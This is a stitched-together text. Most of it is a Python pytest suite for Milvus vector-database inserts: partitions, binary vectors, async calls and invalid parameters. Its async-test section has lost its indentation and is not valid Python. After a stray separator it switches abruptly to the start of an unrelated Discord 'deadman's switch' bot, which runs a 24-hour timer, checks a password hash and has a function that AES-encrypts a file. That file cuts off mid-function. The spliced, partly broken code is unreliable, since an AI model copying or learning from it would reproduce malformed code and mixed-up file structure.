        nb = insert_count
        with pytest.raises(Exception) as e:
            entities = ut.gen_entities(nb)
            del entities[0]
            connect.insert(id_collection, entities)
    # TODO
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_twice_ids_no_ids(self, connect, id_collection):
        """
        target: check the result of insert, with params ids and no ids
        method: test insert vectors twice, use customize ids first, and then use no ids
        expected: BaseException raised
        """
        ids = [i for i in range(default_nb)]
        entities = copy.deepcopy(default_entities)
        entities[0]["values"] = ids
        connect.insert(id_collection, entities)
        with pytest.raises(Exception) as e:
            del entities[0]
            connect.insert(id_collection, entities)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_not_ids(self, connect, id_collection):
        """
        target: check the result of insert, with params ids and no ids
        method: test insert vectors twice, use not ids first, and then use customize ids
        expected: error raised
        """
        entities = copy.deepcopy(default_entities)
        del entities[0]
        with pytest.raises(Exception) as e:
            connect.insert(id_collection, entities)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_ids_length_not_match_batch(self, connect, id_collection):
        """
        target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
        method: create collection and insert vectors in it
        expected: raise an exception
        """
        ids = [i for i in range(1, default_nb)]
        logging.getLogger().info(len(ids))
        entities = copy.deepcopy(default_entities)
        entities[0]["values"] = ids
        with pytest.raises(Exception) as e:
            connect.insert(id_collection, entities)
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(ADD_TIMEOUT)
    def test_insert_ids_length_not_match_single(self, connect, id_collection):
        """
        target: test insert vectors in collection, use customize ids, len(ids) != len(vectors)
        method: create collection and insert vectors in it
        expected: raise an exception
        """
        ids = [i for i in range(1, default_nb)]
        logging.getLogger().info(len(ids))
        entity = copy.deepcopy(default_entity)
        entity[0]["values"] = ids
        with pytest.raises(Exception) as e:
            connect.insert(id_collection, entity)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_partition(self, connect, collection):
        """
        target: test insert entities in collection created before
        method: create collection and insert entities in it, with the partition_name param
        expected: the collection row count equals to nq
        """
        connect.create_partition(collection, default_tag)
        result = connect.insert(collection, default_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        assert connect.has_partition(collection, default_tag)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == default_nb
    # TODO
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_partition_with_ids(self, connect, id_collection):
        """
        target: test insert entities in collection created before, insert with ids
        method: create collection and insert entities in it, with the partition_name param
        expected: the collection row count equals to nq
        """
        connect.create_partition(id_collection, default_tag)
        ids = [i for i in range(default_nb)]
        entities = ut.gen_entities(default_nb)
        entities[0]["values"] = ids
        result = connect.insert(id_collection, entities, partition_name=default_tag)
        assert result.primary_keys == ids
        logging.getLogger().info(connect.describe_collection(id_collection))
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_default_partition(self, connect, collection):
        """
        target: test insert entities into default partition
        method: create partition and insert info collection without tag params
        expected: the collection row count equals to nb
        """
        result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
        assert len(result.primary_keys) == default_nb
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == default_nb
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_partition_not_existed(self, connect, collection):
        """
        target: test insert entities in collection created before
        method: create collection and insert entities in it, with the not existed partition_name param
        expected: error raised
        """
        tag = ut.gen_unique_str()
        with pytest.raises(Exception) as e:
            connect.insert(collection, default_entities, partition_name=tag)
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_partition_repeatedly(self, connect, collection):
        """
        target: test insert entities in collection created before
        method: create collection and insert entities in it repeatly, with the partition_name param
        expected: the collection row count equals to nq
        """
        connect.create_partition(collection, default_tag)
        result = connect.insert(collection, default_entities, partition_name=default_tag)
        result = connect.insert(collection, default_entities, partition_name=default_tag)
        connect.flush([collection])
        res = connect.get_collection_stats(collection)
        assert res[row_count] == 2 * default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_dim_not_matched(self, connect, collection):
        """
        target: test insert entities, the vector dimension is not equal to the collection dimension
        method: the entities dimension is half of the collection dimension, check the status
        expected: error raised
        """
        vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
        insert_entities = copy.deepcopy(default_entities)
        insert_entities[-1]["values"] = vectors
        with pytest.raises(Exception) as e:
            connect.insert(collection, insert_entities)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_field_name_not_match(self, connect, collection):
        """
        target: test insert entities, with the entity field name updated
        method: update entity field name
        expected: error raised
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_field_type_not_match(self, connect, collection):
        """
        target: test insert entities, with the entity field type updated
        method: update entity field type
        expected: error raised
        """
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_field_value_not_match(self, connect, collection):
        """
        target: test insert entities, with the entity field value updated
        method: update entity field value
        expected: error raised
        """
        tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_field_more(self, connect, collection):
        """
        target: test insert entities, with more fields than collection schema
        method: add entity field
        expected: error raised
        """
        tmp_entity = ut.add_field(copy.deepcopy(default_entity))
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_field_vector_more(self, connect, collection):
        """
        target: test insert entities, with more fields than collection schema
        method: add entity vector field
        expected: error raised
        """
        tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_field_less(self, connect, collection):
        """
        target: test insert entities, with less fields than collection schema
        method: remove entity field
        expected: error raised
        """
        tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_field_vector_less(self, connect, collection):
        """
        target: test insert entities, with less fields than collection schema
        method: remove entity vector field
        expected: error raised
        """
        tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_no_field_vector_value(self, connect, collection):
        """
        target: test insert entities, with no vector field value
        method: remove entity values of vector field
        expected: error raised
        """
        tmp_entity = copy.deepcopy(default_entity)
        del tmp_entity[-1]["values"]
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_no_field_vector_type(self, connect, collection):
        """
        target: test insert entities, with no vector field type
        method: remove entity vector field
        expected: error raised
        """
        tmp_entity = copy.deepcopy(default_entity)
        del tmp_entity[-1]["type"]
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_with_no_field_vector_name(self, connect, collection):
        """
        target: test insert entities, with no vector field name
        method: remove entity vector field
        expected: error raised
        """
        tmp_entity = copy.deepcopy(default_entity)
        del tmp_entity[-1]["name"]
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
    # todo fix timeout
    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(30)
    def test_collection_insert_rows_count_multi_threading(self, args, collection):
        """
        target: test collection rows_count is correct or not with multi threading
        method: create collection and insert entities in it(idmap),
            assert the value returned by count_entities method is equal to length of entities
        expected: the count is equal to the length of entities
        """
        if args["handler"] == "HTTP":
            pytest.skip("Skip test in http mode")
        thread_num = 8
        threads = []
        milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
        def insert(thread_i):
            logging.getLogger().info("In thread-%d" % thread_i)
            result = milvus.insert(collection, default_entities)
            milvus.flush([collection])
        for i in range(thread_num):
            x = threading.Thread(target=insert, args=(i,))
            threads.append(x)
            x.start()
        for th in threads:
            th.join()
        stats = milvus.get_collection_stats(collection)
        assert stats[row_count] == thread_num * default_nb
    # TODO: unable to set config
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_disable_auto_flush(self, connect, collection):
        """
        target: test insert entities, with disable autoflush
        method: disable autoflush and insert, get entity
        expected: the count is equal to 0
        """
        delete_nums = 500
        ut.disable_flush(connect)
        result = connect.insert(collection, default_entities)
        ids = result.primary_keys
        res = connect.get_entity_by_id(collection, ids[:delete_nums])
        assert len(res) == delete_nums
        assert res[0] is None
class TestInsertBinary:
    """Insert tests for binary-vector collections (JACCARD metric)."""
    @pytest.fixture(
        scope="function",
        params=ut.gen_binary_index()
    )
    def get_binary_index(self, request):
        # Binary collections in these tests always use the JACCARD metric.
        request.param["metric_type"] = "JACCARD"
        return request.param
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_entities(self, connect, binary_collection):
        """
        target: test insert entities in binary collection
        method: create collection and insert binary entities in it
        expected: the collection row count equals to nb
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_partition(self, connect, binary_collection):
        """
        target: test insert entities and create partition tag
        method: create collection and insert binary entities in it, with the partition_name param
        expected: the collection row count equals to nb
        """
        connect.create_partition(binary_collection, default_tag)
        result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        assert connect.has_partition(binary_collection, default_tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_multi_times(self, connect, binary_collection):
        """
        target: test insert entities multi times and final flush
        method: create collection and insert binary entity multi and final flush
        expected: the collection row count equals to nb
        """
        for i in range(default_nb):
            result = connect.insert(binary_collection, default_binary_entity)
            assert len(result.primary_keys) == 1
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats[row_count] == default_nb
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test insert binary entities after build index
        method: build index and insert entities
        expected: no error raised
        """
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index
    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
        """
        target: test build index insert after vector
        method: insert vector and build index
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        assert len(result.primary_keys) == default_nb
        connect.flush([binary_collection])
        connect.create_index(binary_collection, binary_field_name, get_binary_index)
        index = connect.describe_index(binary_collection, "")
        ut.create_target_index(get_binary_index, binary_field_name)
        assert index == get_binary_index
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_binary_search(self, connect, binary_collection):
        """
        target: test search vector after insert vector after a while
        method: insert vector, sleep, and search collection
        expected: no error raised
        """
        result = connect.insert(binary_collection, default_binary_entities)
        connect.flush([binary_collection])
        query, vecs = ut.gen_query_vectors(binary_field_name, default_binary_entities, ut.default_top_k, 1,
                                           metric_type="JACCARD")
        connect.load_collection(binary_collection)
        res = connect.search(binary_collection, query)
        logging.getLogger().debug(res)
        assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
    @pytest.fixture(scope="function", autouse=True)
    def skip_http_check(self, args):
        # Async insert is not supported over the HTTP handler; skip the class.
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")
    # Parameterized entity counts: a single entity and a larger batch.
    @pytest.fixture(
        scope="function",
        params=[
            1,
            1000
        ],
    )
    def insert_count(self, request):
        yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
    """
    ******************************************************************
      The following cases are used to test `insert` function
      across multiple collections
    ******************************************************************
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        logging.getLogger().info(request.param)
        # if str(connect._cmd("mode")) == "CPU":
        #     if request.param["index_type"] in index_cpu_not_support():
        #         pytest.skip("sq8h not support in CPU mode")
        return request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_multi_collections(self, connect):
        """
        target: test insert entities
        method: create 10 collections and insert entities into them in turn
        expected: row count of each collection equals default_nb
        """
        collection_num = 10
        collection_list = []
        for i in range(collection_num):
            collection_name = ut.gen_unique_str(uid)
            collection_list.append(collection_name)
            connect.create_collection(collection_name, default_fields)
            result = connect.insert(collection_name, default_entities)
            connect.flush([collection_name])
            assert len(result.primary_keys) == default_nb
            stats = connect.get_collection_stats(collection_name)
            assert stats[row_count] == default_nb
        for i in range(collection_num):
            connect.drop_collection(collection_list[i])

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_drop_collection_insert_entity_another(self, connect, collection):
        """
        target: test insert vector to collection_1 after collection_2 deleted
        method: delete collection_2 and insert vector to collection_1
        expected: row count equals the length of entities inserted
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.drop_collection(collection)
        result = connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        assert len(result.primary_keys) == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
        """
        target: test insert vector to collection_2 after build index for collection_1
        method: build index and insert vector
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.create_index(collection, field_name, get_simple_index)
        result = connect.insert(collection_name, default_entity)
        assert len(result.primary_keys) == 1
        # FLAT is the implicit default and is not reported by describe_index.
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        connect.drop_collection(collection_name)

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test building an index on collection_2 after inserting into collection_1
        method: insert vector and build index on another collection
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        if get_simple_index["index_type"] != "FLAT":
            index = connect.describe_index(collection_name, "")
            ut.create_target_index(get_simple_index, field_name)
            assert index == get_simple_index
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
        """
        target: test building an index on collection_2 a while after inserting into collection_1
        method: insert vector, flush, then build index on another collection
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.create_index(collection_name, field_name, get_simple_index)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_search_entity_insert_entity_another(self, connect, collection):
        """
        target: test insert entity to collection_1 after search collection_2
        method: search collection and insert entity
        expected: status ok
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        connect.load_collection(collection)
        res = connect.search(collection, default_single_query)
        assert len(res[0]) == 0
        connect.insert(collection_name, default_entity)
        connect.flush([collection_name])
        stats = connect.get_collection_stats(collection_name)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L0)
    def test_insert_entity_search_entity_another(self, connect, collection):
        """
        target: test searching collection_2 after inserting into collection_1
        method: insert entity, then search the other collection
        expected: status ok and row count of collection_1 is 1
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        stats = connect.get_collection_stats(collection)
        assert stats[row_count] == 1

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_entity_sleep_search_entity_another(self, connect, collection):
        """
        target: test searching collection_2 a while after inserting into collection_1
        method: insert entity, flush, then search the (empty) other collection
        expected: search returns no hits
        """
        collection_name = ut.gen_unique_str(uid)
        connect.create_collection(collection_name, default_fields)
        result = connect.insert(collection, default_entity)
        connect.flush([collection])
        connect.load_collection(collection_name)
        res = connect.search(collection_name, default_single_query)
        assert len(res[0]) == 0

    @pytest.mark.timeout(ADD_TIMEOUT)
    @pytest.mark.tags(CaseLabel.L2)
    def _test_insert_entity_during_release_collection(self, connect, collection):
        """
        target: test insert entity during release
        method: release collection async, then do insert operation
        expected: insert ok
        """
        for i in range(10):
            connect.insert(collection, default_entities)
        connect.flush([collection])
        connect.load_collection(collection)

        def release():
            connect.release_collection(collection)

        # release() takes no parameters (it closes over `collection`); the
        # original passed args=(collection,), which made the worker thread
        # raise TypeError instead of releasing the collection.
        t = threading.Thread(target=release)
        t.start()
        result = connect.insert(collection, default_entities)
        assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
    """
    Test inserting entities with invalid parameters: collection names,
    partition names, field names, field types and field values.
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(id_collection, default_entities, ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid collection name
        expected: raise exception
        """
        collection_name = get_collection_name
        with pytest.raises(Exception):
            connect.insert(collection_name, default_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
        """
        target: test insert with invalid scenario
        method: insert with invalid partition name
        expected: raise exception (a None partition name is treated as
                  "no partition" and must succeed)
        """
        tag_name = get_tag_name
        connect.create_partition(collection, default_tag)
        if tag_name is not None:
            with pytest.raises(Exception):
                connect.insert(collection, default_entity, partition_name=tag_name)
        else:
            connect.insert(collection, default_entity, partition_name=tag_name)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
        """
        target: test insert with an invalid field name
        method: rename the "int64" field to an invalid name and insert
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
        """
        target: test insert with an invalid field type
        method: change the 'float' field's type to an invalid value and insert
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        field_value = get_field_int_value
        tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
        """
        target: test insert with invalid entity
        method: insert with invalid entity value
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_entity)
        # Corrupt one coordinate of the first vector in the vector field
        # (the last entry of the entity list).
        src_vector = tmp_entity[-1]["values"]
        src_vector[0][1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
    """
    Test inserting binary entities with invalid parameters: field names,
    field types, field values and customized ids.
    """

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_collection_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_tag_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_name(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_type(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_strs()
    )
    def get_field_int_value(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_ints()
    )
    def get_entity_id(self, request):
        yield request.param

    @pytest.fixture(
        scope="function",
        params=ut.gen_invalid_vectors()
    )
    def get_field_vectors_value(self, request):
        yield request.param

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
        """
        target: test insert with invalid field name
        method: insert with invalid field name
        expected: raise exception
        """
        tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
        """
        target: test insert with an invalid int-field value
        method: replace the 'int64' field's type/value with an invalid string
        expected: raise exception
        """
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid scenario
        method: insert with invalid field entity
        expected: raise exception
        """
        tmp_entity = copy.deepcopy(default_binary_entity)
        # Replace the first binary vector wholesale with an invalid value.
        src_vectors = tmp_entity[-1]["values"]
        src_vectors[0] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
        """
        target: test insert, with using customize ids, which are not int64
        method: create collection and insert entities in it
        expected: raise an exception
        """
        entity_id = get_entity_id
        ids = [entity_id for _ in range(default_nb)]
        with pytest.raises(Exception):
            connect.insert(binary_id_collection, default_binary_entities, ids)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
        """
        target: test insert with invalid field type
        method: insert with invalid field type
        expected: raise exception
        """
        field_type = get_field_type
        tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entity)

    @pytest.mark.tags(CaseLabel.L2)
    def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
        """
        target: test insert with invalid field
        method: insert with invalid field value
        expected: raise exception
        """
        tmp_entities = copy.deepcopy(default_binary_entities)
        # Corrupt the second binary vector in the batch.
        src_vector = tmp_entities[-1]["values"]
        src_vector[1] = get_field_vectors_value
        with pytest.raises(Exception):
            connect.insert(binary_collection, tmp_entities)
|
discord_bot.py | # Discord bot for deadman's switch
import discord # For discord bot interface
from discord.ext import commands
import hashlib # To hash inputted password and verify hashes
from time import *
import threading # To run main(), timer() and the bot in parallel
import datetime # For timer()
import pyAesCrypt # To encrypt files in payload()
import os
###################################### Functions ######################################################
# Timer function
def timer():
    """Count down 24 hours in 1-second steps, then set time_out.

    time_left and time_out are module-level globals so the bot commands
    can read the remaining time and reset the countdown while this loop
    runs on a background thread.
    """
    global time_left
    global time_out
    time_out = False
    time_left = datetime.timedelta(hours=24)  # Set here time
    while time_left >= datetime.timedelta(seconds=1):
        time_left -= datetime.timedelta(seconds=1)
        sleep(1)
    # The loop only exits once the countdown has reached zero, so this
    # condition always holds here; kept as-is to avoid behavior changes.
    if time_left <= datetime.timedelta(seconds=1):
        time_out = True
        print("Time over")
    return True
# Threading settings to run timer on background
# NOTE(review): started at import time, so the 24h countdown begins as soon
# as this module is loaded — confirm this is intended.
timer_thread = threading.Thread(target=timer)
timer_thread.start()
# Authentication function
def auth(password):
    """Return True when *password*'s SHA-512 hex digest matches the stored hash.

    :param password: plaintext password supplied by the user
    """
    # SHA-512 hex digest of the real password, as bytes; replace the placeholder.
    expected = b"putyourhashinhere"  # Set password hash
    hashed_pwd = hashlib.sha512(password.encode("utf-8")).hexdigest().encode("utf-8")
    # Direct comparison replaces the original if/else returning True/False,
    # and renaming the constant avoids shadowing the builtin `hash`.
    return hashed_pwd == expected
# Payload from original deadman's switch
def FirePayload(filePath, encryptPass):
    """Encrypt the target file to <filePath>.aes, delete the original, and exit.

    :param filePath: path of the file to lock down
    :param encryptPass: passphrase used for AES encryption
    """
    print("Deadman don't talk")
    bufferSize = 64 * 1024  # encryption/decryption buffer size - 64K
    pyAesCrypt.encryptFile(filePath, (filePath+'.aes'), encryptPass, bufferSize)  # encrypt
    # secure_delete.secure_random_seed_init()  # Secure delete module available for Windows and Linux
    # secure_delete.secure_delete(filePath)
